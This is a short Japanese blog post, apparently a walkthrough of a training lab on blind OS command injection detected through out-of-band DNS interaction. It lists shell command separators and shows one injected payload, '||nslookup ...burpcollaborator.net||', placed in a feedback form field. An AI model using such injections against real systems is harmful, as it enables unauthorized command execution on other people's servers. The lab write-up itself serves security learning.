shikata ga nai

Private? There is no such things.

Blind OS command injection with out-of-band interactionをやってみた

Hello there, ('ω')ノ

 

帯域外の相互作用を伴うブラインドOSコマンドインジェクションを。

 

文字列はコマンドセパレータとして機能して。

コマンドをチェーン化できて。

下記のコマンドセパレータは、WindowsとUnixベースの両方で機能して。


&
&&
|
||

 

まずは、下記のページからフィードバックを送信して。

 

f:id:ThisIsOne:20210318155355p:plain

 

対象となるリクエストをリピータへ。

 

f:id:ThisIsOne:20210318155523p:plain

 

コラボレータを起動して、クリップボードにコピーして。

 

f:id:ThisIsOne:20210318155904p:plain

 

下記を追加して、指定されたドメインのDNSルックアップを実行すると。

 ||nslookup+mlbbwwapafyrdggz3k7kcv48izoqcf.burpcollaborator.net||

 

f:id:ThisIsOne:20210318160540p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210318160135p:plain

 

攻撃者は、実行された特定の検索を監視して。

コマンドが正常に挿入されたことを検出できて。

 

f:id:ThisIsOne:20210318160229p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain